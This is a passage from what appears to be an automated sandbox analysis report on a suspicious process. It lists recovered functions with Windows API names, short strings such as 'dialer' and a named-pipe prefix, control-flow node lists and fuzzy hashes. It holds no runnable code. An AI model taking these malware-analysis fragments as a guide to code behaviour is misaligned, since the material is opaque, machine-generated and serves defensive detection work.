                                                                                                                                                            • Instruction Fuzzy Hash: 44E19476A047888AEBA0DFA5D4D83AD77F0F745B98F100116DE8967B5DCB38C2A1C760
                                                                                                                                                            Function 00000230D90E9944 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 483 230d90e9944-230d90e99ac call 230d90ea814 486 230d90e99b2-230d90e99b5 483->486 487 230d90e9e13-230d90e9e1b call 230d90ebb48 483->487 486->487 488 230d90e99bb-230d90e99c1 486->488 490 230d90e99c7-230d90e99cb 488->490 491 230d90e9a90-230d90e9aa2 488->491 490->491 495 230d90e99d1-230d90e99dc 490->495 493 230d90e9aa8-230d90e9aac 491->493 494 230d90e9d63-230d90e9d67 491->494 493->494 498 230d90e9ab2-230d90e9abd 493->498 496 230d90e9d69-230d90e9d70 494->496 497 230d90e9da0-230d90e9daa call 230d90e8a34 494->497 495->491 499 230d90e99e2-230d90e99e7 495->499 496->487 500 230d90e9d76-230d90e9d9b call 230d90e9e1c 496->500 497->487 511 230d90e9dac-230d90e9dcb call 230d90e6d40 497->511 498->494 502 230d90e9ac3-230d90e9aca 498->502 499->491 503 230d90e99ed-230d90e99f7 call 230d90e8a34 499->503 500->497 507 230d90e9c94-230d90e9ca0 502->507 508 230d90e9ad0-230d90e9b07 call 230d90e8e10 502->508 503->511 514 230d90e99fd-230d90e9a28 call 230d90e8a34 * 2 call 230d90e9124 503->514 507->497 512 230d90e9ca6-230d90e9caa 507->512 508->507 519 230d90e9b0d-230d90e9b15 508->519 516 230d90e9cac-230d90e9cb8 call 230d90e90e4 512->516 517 230d90e9cba-230d90e9cc2 512->517 551 230d90e9a2a-230d90e9a2e 514->551 552 230d90e9a48-230d90e9a52 call 230d90e8a34 514->552 516->517 527 230d90e9cdb-230d90e9ce3 516->527 517->497 518 230d90e9cc8-230d90e9cd5 call 230d90e8cb4 517->518 518->497 518->527 524 230d90e9b19-230d90e9b4b 519->524 529 230d90e9c87-230d90e9c8e 524->529 530 230d90e9b51-230d90e9b5c 524->530 532 230d90e9ce9-230d90e9ced 527->532 533 230d90e9df6-230d90e9e12 call 230d90e8a34 * 2 call 230d90ebaa8 527->533 529->507 529->524 530->529 534 230d90e9b62-230d90e9b7b 530->534 536 230d90e9cef-230d90e9cfe call 230d90e90e4 532->536 537 230d90e9d00 532->537 533->487 538 230d90e9c74-230d90e9c79 534->538 539 230d90e9b81-230d90e9bc6 call 230d90e90f8 * 2 534->539 547 230d90e9d03-230d90e9d0d call 230d90ea8ac 536->547 537->547 543 230d90e9c84 538->543 564 230d90e9bc8-230d90e9bee call 230d90e90f8 call 230d90ea038 539->564 565 230d90e9c04-230d90e9c0a 539->565 543->529 547->497 562 230d90e9d13-230d90e9d61 call 230d90e8d44 call 230d90e8f50 547->562 551->552 556 230d90e9a30-230d90e9a3b 551->556 552->491 568 230d90e9a54-230d90e9a74 call 230d90e8a34 * 2 call 230d90ea8ac 552->568 556->552 561 230d90e9a3d-230d90e9a42 556->561 561->487 561->552 562->497 583 230d90e9c15-230d90e9c72 call 230d90e9870 564->583 584 230d90e9bf0-230d90e9c02 564->584 570 230d90e9c0c-230d90e9c10 565->570 571 230d90e9c7b 565->571 589 230d90e9a8b 568->589 590 230d90e9a76-230d90e9a80 call 230d90ea99c 568->590 570->539 576 230d90e9c80 571->576 576->543 583->576 584->564 584->565 589->491 593 230d90e9a86-230d90e9def call 230d90e86ac call 230d90ea3f4 call 230d90e88a0 590->593 594 230d90e9df0-230d90e9df5 call 230d90ebaa8 590->594 593->594 594->533
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000005.00000002.2582442342.00000230D90E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000230D90E0000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_5_2_230d90e0000_cmd.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                            • String ID: csm$csm$csm
                                                                                                                                                            • API String ID: 849930591-393685449
                                                                                                                                                            • Opcode ID: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                                                                                                                            • Instruction ID: f856906d3125aa9181ef00f8c435a7e036affc1c177897faf0a8485c7a8d94d0
                                                                                                                                                            • Opcode Fuzzy Hash: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                                                                                                                            • Instruction Fuzzy Hash: 29E1AC72A047488EEB60DBA5F49839D7BF0F745B88F140915FEA987B99CB38C691C710
                                                                                                                                                            Function 00000230D921F394 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000005.00000002.2589942922.00000230D9210000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000230D9210000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_5_2_230d9210000_cmd.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: AddressFreeLibraryProc
                                                                                                                                                            • String ID: api-ms-$ext-ms-
                                                                                                                                                            • API String ID: 3013587201-537541572
                                                                                                                                                            • Opcode ID: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                                                                                                                            • Instruction ID: 0e89d6f7a2ccd22d0932d692a2da7b91a4558e7e33ca67bb32c97b5b05e3ce74
                                                                                                                                                            • Opcode Fuzzy Hash: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                                                                                                                            • Instruction Fuzzy Hash: 57413922B11B0451FB91CB96A8E87B523F1F745BE0F0541259E1EA778CDF3CC6598328
                                                                                                                                                            Function 00000230D921104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99memoryregistryCOMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000005.00000002.2589942922.00000230D9210000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000230D9210000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_5_2_230d9210000_cmd.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                                                                                                                            • String ID: d
                                                                                                                                                            • API String ID: 3743429067-2564639436
                                                                                                                                                            • Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                                                                                                            • Instruction ID: d4ee1ae639f07c050a8cb73721d7b6a406d09454b8206db8814330c6f6e88266
                                                                                                                                                            • Opcode Fuzzy Hash: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                                                                                                            • Instruction Fuzzy Hash: AE415C33614B8886E7A4CF61E4993AAB7B1F388B98F048119DA891775CDF3CC555CB10
                                                                                                                                                            Function 00000230D921D068 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 54COMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • FlsGetValue.KERNEL32(?,?,?,00000230D921C7DE,?,?,?,?,?,?,?,?,00000230D921CF9D,?,?,00000001), ref: 00000230D921D087
                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00000230D921C7DE,?,?,?,?,?,?,?,?,00000230D921CF9D,?,?,00000001), ref: 00000230D921D0A6
                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00000230D921C7DE,?,?,?,?,?,?,?,?,00000230D921CF9D,?,?,00000001), ref: 00000230D921D0CE
                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00000230D921C7DE,?,?,?,?,?,?,?,?,00000230D921CF9D,?,?,00000001), ref: 00000230D921D0DF
                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00000230D921C7DE,?,?,?,?,?,?,?,?,00000230D921CF9D,?,?,00000001), ref: 00000230D921D0F0
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000005.00000002.2589942922.00000230D9210000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000230D9210000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_5_2_230d9210000_cmd.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Value
                                                                                                                                                            • String ID: 1%$Y%
                                                                                                                                                            • API String ID: 3702945584-1395475152
                                                                                                                                                            • Opcode ID: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                                                                                                                            • Instruction ID: b3cab89b64310a4d0faa7a1324c802c9e02f0c9f8a345d2cd7cc19bbbc6dfce8
                                                                                                                                                            • Opcode Fuzzy Hash: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                                                                                                                            • Instruction Fuzzy Hash: 29116320F0578C81FAE8A7B555FE37962F1DB447F0F144324983966AEEDE2CD6628220
                                                                                                                                                            Function 00000230D9217510 Relevance: 12.2, APIs: 8, Instructions: 230COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000005.00000002.2589942922.00000230D9210000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000230D9210000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_5_2_230d9210000_cmd.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 190073905-0
                                                                                                                                                            • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                                                                                                            • Instruction ID: 62e1c2b7e757c4cac1f2192e18178f66987b5a109bcbd3d5f5159c3c55e8cb03
                                                                                                                                                            • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                                                                                                            • Instruction Fuzzy Hash: 6681C421E0034D4AFBD4ABE598F937922F8E7E5B80F144425A904A779EDB3CCB658730
                                                                                                                                                            Function 00000230D9219DC4 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000005.00000002.2589942922.00000230D9210000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000230D9210000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_5_2_230d9210000_cmd.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                            • String ID: api-ms-
                                                                                                                                                            • API String ID: 2559590344-2084034818
                                                                                                                                                            • Opcode ID: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                                                                                                                            • Instruction ID: 6806f38a870ad59bd236090cf089208546bd1cf890b347db42578c6b0594e3b7
                                                                                                                                                            • Opcode Fuzzy Hash: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                                                                                                                            • Instruction Fuzzy Hash: 1031C526A12748D1EE92DF82F4A877522F4F748BA0F6905269D1D1B39CDF3DC6658320
                                                                                                                                                            Function 00000230D9223DB4 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000005.00000002.2589942922.00000230D9210000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000230D9210000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_5_2_230d9210000_cmd.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                                                            • String ID: CONOUT$
                                                                                                                                                            • API String ID: 3230265001-3130406586
                                                                                                                                                            • Opcode ID: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                                                                                                                            • Instruction ID: 14f2e44ce155c3a00de019a6a4b9596f922b866b33e1d76f6d3aebf3a5244bbc
                                                                                                                                                            • Opcode Fuzzy Hash: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                                                                                                                            • Instruction Fuzzy Hash: 2F118632B10B8486E7908F96F8A832976F0F788FE4F044215EA5987799CF3CC6148754
                                                                                                                                                            Function 00000230D9213790 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 44COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000005.00000002.2589942922.00000230D9210000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000230D9210000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_5_2_230d9210000_cmd.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CurrentProcessProtectVirtual$HandleModule
                                                                                                                                                            • String ID: wr
                                                                                                                                                            • API String ID: 1092925422-2678910430
                                                                                                                                                            • Opcode ID: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                                                                                                                            • Instruction ID: 6e57c8059217a4b34d3b160b9adffff002c820da3a76c285d2d9111bb661bea7
                                                                                                                                                            • Opcode Fuzzy Hash: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                                                                                                                            • Instruction Fuzzy Hash: 7A117C26B05B8982EF949B51E46826A72B1F748B84F04002ADE8917758EF3DC715C728
                                                                                                                                                            Function 00000230D9215B30 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000005.00000002.2589942922.00000230D9210000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000230D9210000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_5_2_230d9210000_cmd.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Thread$Current$Context
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1666949209-0
                                                                                                                                                            • Opcode ID: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                                                                                                                                                            • Instruction ID: 0259cc3e5bd68a47e8a417e7208c877170efcf6ce69baa622040d49fbe63052e
                                                                                                                                                            • Opcode Fuzzy Hash: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                                                                                                                                                            • Instruction Fuzzy Hash: 80D19A76614B8885DAB09B86E4E436A77F0F3C8B84F100156EACD57BA9DF3CC651CB50
                                                                                                                                                            Function 00000230D9212F04 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 93memoryCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000005.00000002.2589942922.00000230D9210000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000230D9210000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_5_2_230d9210000_cmd.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Heap$Process$AllocFree
                                                                                                                                                            • String ID: dialer
                                                                                                                                                            • API String ID: 756756679-3528709123
                                                                                                                                                            • Opcode ID: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                                                                                                                            • Instruction ID: a6543722d859f4a140ddbbaf938a7370185ad0992bcea7882f1596235d3f2301
                                                                                                                                                            • Opcode Fuzzy Hash: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                                                                                                                            • Instruction Fuzzy Hash: 6531C522B01B5982E794DF96E5A873A67F1FB44B80F084121EE4857B69EF3CD6B18710
                                                                                                                                                            Function 00000230D921CFA0 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000005.00000002.2589942922.00000230D9210000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000230D9210000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_5_2_230d9210000_cmd.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Value$ErrorLast
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2506987500-0
                                                                                                                                                            • Opcode ID: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                                                                                                                            • Instruction ID: d9a4c15796ec447c937ae3d54500e02b2c84ef722bf71ed512ef800088086db0
                                                                                                                                                            • Opcode Fuzzy Hash: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                                                                                                                            • Instruction Fuzzy Hash: 5A116324F0538C82FAE4A7A556FD37912F1DB457B0F144715983667BEEDF2C96218220
                                                                                                                                                            Function 00000230D921199C Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000005.00000002.2589942922.00000230D9210000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000230D9210000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_5_2_230d9210000_cmd.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 517849248-0
                                                                                                                                                            • Opcode ID: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                                                                                                                            • Instruction ID: e3c789ba366dbf31b76001c7450954e2aecf7506cbb2e062e66062be159ea7c2
                                                                                                                                                            • Opcode Fuzzy Hash: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                                                                                                                            • Instruction Fuzzy Hash: 38015B22B00A8882EB94DB92E4A836A63F1F788FC0F584036DE4953759DF3CCA49C714
                                                                                                                                                            Function 00000230D92136C8 Relevance: 9.0, APIs: 6, Instructions: 38threadCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000005.00000002.2589942922.00000230D9210000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000230D9210000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_5_2_230d9210000_cmd.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 449555515-0
                                                                                                                                                            • Opcode ID: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                                                                                                                            • Instruction ID: c6c2fdbada0da571ab1d37107481d8fa1907281a2438699de315231a52d2fa52
                                                                                                                                                            • Opcode Fuzzy Hash: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                                                                                                                            • Instruction Fuzzy Hash: 92015E66A11B4882EBA49BA1F8AC32A32F0FB49B81F040429CD491775DEF3DC319C724
                                                                                                                                                            Function 00000230D9219005 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 135COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000005.00000002.2589942922.00000230D9210000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000230D9210000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_5_2_230d9210000_cmd.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                                                            • String ID: csm$f
                                                                                                                                                            • API String ID: 2395640692-629598281
                                                                                                                                                            • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                                                                                                            • Instruction ID: 127e448ece45a1ef7e07f097991da7e74bed997000566eda1d7f1fcec42d2c52
                                                                                                                                                            • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                                                                                                            • Instruction Fuzzy Hash: 3E51A33AB017088ADB98DF55F49CB6937F6F344B88F148124DA066374CEB79DA91C724
                                                                                                                                                            Function 00000230D9218FE8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 75COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000005.00000002.2589942922.00000230D9210000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000230D9210000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_5_2_230d9210000_cmd.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                                                            • String ID: csm$f
                                                                                                                                                            • API String ID: 2395640692-629598281
                                                                                                                                                            • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                                                                                                            • Instruction ID: f64fb2cd96a6736690c68ef385871fef910887cf7787888a3a53ef8a04d06bf5
                                                                                                                                                            • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                                                                                                            • Instruction Fuzzy Hash: 91317A3AA0174896E7949F51F8AC76A37B5F344B88F158014AE4623789DB3DCAA0C724
                                                                                                                                                            Function 00000230D9211A40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000005.00000002.2589942922.00000230D9210000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000230D9210000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_5_2_230d9210000_cmd.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: FinalHandleNamePathlstrlen
                                                                                                                                                            • String ID: \\?\
                                                                                                                                                            • API String ID: 2719912262-4282027825
                                                                                                                                                            • Opcode ID: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                                                                                                                            • Instruction ID: c5eabfbc4dce51eb00d7db9e91c22dd16de2934a0e178ee3b2b34b22c42588ab
                                                                                                                                                            • Opcode Fuzzy Hash: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                                                                                                                            • Instruction Fuzzy Hash: 55F04422B0468992E7A08BA1F8E876A67B0F748B88F944021DA494699DDF7CC74DCB14
                                                                                                                                                            Function 00000230D9213044 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000005.00000002.2589942922.00000230D9210000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000230D9210000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_5_2_230d9210000_cmd.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CombinePath
                                                                                                                                                            • String ID: \\.\pipe\
                                                                                                                                                            • API String ID: 3422762182-91387939
                                                                                                                                                            • Opcode ID: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                                                                                                                            • Instruction ID: 38b259e5030e6d4ff33fab355b7e742526195e32011f54be37c98982b0c64879
                                                                                                                                                            • Opcode Fuzzy Hash: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                                                                                                                            • Instruction Fuzzy Hash: 7BF05E21A04B8C82EA808F92B9A812A62F1EB48FD0F184131EE4A07B2CDE3CC6558714
                                                                                                                                                            Function 00000230D921BC98 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000005.00000002.2589942922.00000230D9210000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000230D9210000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_5_2_230d9210000_cmd.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                            • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                            • API String ID: 4061214504-1276376045
                                                                                                                                                            • Opcode ID: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                                                                                                                            • Instruction ID: 6e70634f0af33b44e24a1b6db91c742b06c283c3084ee28f637e188cfc3fcb70
                                                                                                                                                            • Opcode Fuzzy Hash: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                                                                                                                            • Instruction Fuzzy Hash: B1F09662B1170C81FB548BA5E8EC37A63B0FB88B61F54021ADA6A461ECCF3CC744C364
                                                                                                                                                            Function 00000230D92150D0 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000005.00000002.2589942922.00000230D9210000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000230D9210000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_5_2_230d9210000_cmd.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CurrentThread
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2882836952-0
                                                                                                                                                            • Opcode ID: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                                                                                                                                                            • Instruction ID: b043c07d230c757ce76e4e69ed8ecda40e4b008eb357fbfd6159e7e8b702a9c8
                                                                                                                                                            • Opcode Fuzzy Hash: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                                                                                                                                                            • Instruction Fuzzy Hash: 7D02C832619B8886E7A0CB95E4A476AB7F0F3C5794F100016EA8E97BADDF7CC554CB10
                                                                                                                                                            Function 00000230D9215710 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000005.00000002.2589942922.00000230D9210000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000230D9210000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_5_2_230d9210000_cmd.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CurrentThread
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2882836952-0
                                                                                                                                                            • Opcode ID: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                                                                                                                                                            • Instruction ID: 319d91c37ddffe65b931fd228f8b9a04d5914b45f2cb0589d7d152dd36b0405a
                                                                                                                                                            • Opcode Fuzzy Hash: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                                                                                                                                                            • Instruction Fuzzy Hash: 6161CE36919B48C6E7A0CB95E4A972A77F0F388784F10015AEA8D57BACDB7CC650CF50
                                                                                                                                                            Function 00000230D9224104 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
